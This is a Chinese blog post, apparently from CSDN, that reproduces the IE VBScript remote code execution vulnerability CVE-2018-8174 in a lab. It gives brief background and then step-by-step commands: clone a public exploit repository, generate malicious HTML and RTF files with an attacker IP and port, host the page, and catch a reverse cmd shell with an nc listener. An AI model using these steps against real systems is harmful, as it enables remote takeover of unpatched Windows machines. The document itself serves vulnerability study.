CVE-2018-8174 IE浏览器远程代码执行漏洞

0x00漏洞简介

在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用

原文地址:http://www.4hou.com/vulnerable/11441.html

CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞

CVE地址:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174

这个漏洞的影响范围为

A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

基本上影响了所有的高版本windows

漏洞细节已经有很多大佬已经写出来了 此处不过多描述了

比如https://www.freebuf.com/vuls/172983.html

0x01复现过程

首先到github上面找exp

https://github.com/Sch01ar/CVE-2018-8174_EXP

然后克隆到本地

git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

然后生成payload

python CVE-2018-8174.py -u payload的url -o rtf文件的名字 -i ip地址 -p 端口

然后就能看到生成了两个文件一个html一个rtf文件

然后把这个html扔到nginx的网站目录下

然后启动nc监听刚才设置的端口

然后打开ie浏览器访问一下这个html

然后ie浏览器并不会正常显示这个页面 但是攻击已经成功了

此时我们去看看我们的nc已经成功的拿到了反弹回来的cmd了

  • 1
    点赞
  • 0
    评论
  • 3
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 终极编程指南 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值